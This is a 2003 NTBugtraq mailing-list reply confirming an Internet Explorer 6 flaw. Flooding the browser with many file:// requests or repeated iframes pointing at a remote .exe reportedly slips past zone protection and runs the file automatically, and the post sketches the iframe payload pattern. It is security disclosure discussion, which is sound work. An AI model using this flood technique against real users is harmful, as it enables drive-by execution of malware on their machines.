Re: Flooding Internet Explorer 6.0.2800 (6.x?) security zones ! - UPDATED
Date: Thu, 15 May 2003 21:05:54 -0000 To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
Further to my confirmation of seeing this in the past as detailed
below, I am today delighted to inform you that I can reconfirm that
it functions precisely as you describe:
1. Definitely processor related as after 10 minutes of bogging down
the machine, BANG ! it automatically opened the .exe
2. Thereon after, all following .exe's are also automatically opened
Tested on the following page which is nothing more than a sh!tload of:
Note: may of course be different on other machines [i.e. processor
power...increase amount of frame 'suppose]
Well Done ! It's a beauty !
I had sent this to bugtraq when you initially posted it, confirming
having seen it in the past as well. Will try your html file and see
if can get it up and running again.
Forwarded From: "email@example.com"
> I've noticed that on my test environment it is possible to bypass
> InternetExplorer Zones protection by flooding it with large number
> file://requests in example to infected fileserver. The result of
> bypass isEXECUTION OF ANY REQUESTED FILE. My requested file
> was 'trojan.exe' placedon neighbour WIN2K Professional workstation.
> To see code used during the test check files in attached archive.
> On IE 6.0 the result was always the same, after more than 200
> boxes with 'trojan.exe' request, suddenly requested file got
> Excellent. Can confirm seeing this happen twice in the past two
> years. Both in Internet Explorer and Outlook Express, using an
> and a remote executable on the server e.g. <iframe
> src="http://...../malware.exe"> multiple instances on one page. One
> slipped through and the file was executed automatically.
> Not been able to replicate since though.
> May be a combo machine power and 'confusing' IE [easier].
-- http://www.malware.com oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo EXECUTIVE SEMINAR: "Information Security and the Disappearing Perimeter" Join Peter S. Tippett, PhD, M.D., the industry's foremost authority on network security, and TruSecure for a free breakfast seminar on "The Impact of the Disappearing Perimeter." Learn how you can proactively protect your organization against today's newest threats, including those from remote users, business partners and wireless. To register, and to view the full list of dates and cities, click below or call 1-888-396-8348. http://www.trusecure.com/offer/s0096/ oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo